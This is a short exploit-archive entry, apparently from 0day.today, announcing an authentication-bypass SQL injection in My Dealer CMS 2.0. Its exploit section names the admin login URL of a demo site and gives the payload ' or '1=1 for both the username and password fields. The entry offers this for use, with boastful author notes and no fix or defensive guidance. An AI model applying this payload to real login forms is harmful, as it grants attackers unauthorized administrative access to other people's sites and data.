id: 5013
date: 04/08/2009
title: My Dealer CMS 2.0 (Auth Bypass) SQL Injection Vulnerability
author: ThE g0bL!N
cves: 

===========================================================
My Dealer CMS 2.0 (Auth Bypass) SQL Injection Vulnerability
===========================================================


-----------------------------------------------------
My Dealer Cms 2.0 (auth Bypass) Remote Sql Injecion
-----------------------------------------------------
Founder: ThE g0bL!N(Dz)
Vive Algerie
# demo : http://www.mydealercms.biz/demo/

Note : Les Algerien Rasa wa Li Yekhreb Fina Basa :)
-----------------------------------------------------------
-----------------------------------------------------------
exploit
-------
http://www.mydealercms.biz/demo/admin/
username:  ' or '1=1
Password:  ' or '1=1

demo:
-----
http://www.mydealercms.biz/demo/admin/
------------------------------------------------------



#  0day.today [2023-03-24]  #